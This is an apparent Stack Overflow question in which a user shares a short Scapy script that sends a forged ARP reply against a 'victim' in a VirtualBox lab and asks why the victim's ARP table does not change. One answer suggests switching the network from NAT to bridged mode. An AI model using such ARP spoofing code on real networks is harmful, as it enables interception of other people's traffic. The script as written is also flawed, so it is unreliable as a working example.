# Why the mac address of the victim machine never changes when using arp spoofing?

Tags: python, scapy

```
import scapy.all as scapy 
victim_mac = '52:54:00:12:35:02'
victim_ip = '10.0.2.2'
hacker_mac = '08:00:27:22:46:4f'
hacker_ip = '10.0.2.15'    
arp_packet = scapy.ARP(op=2, hwdst=victim_mac, pdst=victim_ip, hwsrc=hacker_mac, psrc=hacker_ip)
scapy.sendp(arp_packet)
```

Result:

```
Sent 1 packet
```

but the problem is the mac address of the victim machine doesn't change where is the problem ?

if i go to check the victim interface details nothing changed

victim interface details :

```
Internet Address              Physical Address
10.0.2.2                     52:54:00:12:35:02
```

Comment: How do you think ARP spoofing works?

Comment: it fools the router to send the victim traffic to the hacker machine

Comment: I guess your question is based on a misunderstanding on how ARP spoofing works. And that's not a topic for Stack Overflow.

Comment: then tell me how arp works

Comment: Please read my last sentence again!

Answer (score 0):

Change the NAT network in virtualbox to bridge network that's the solution for this error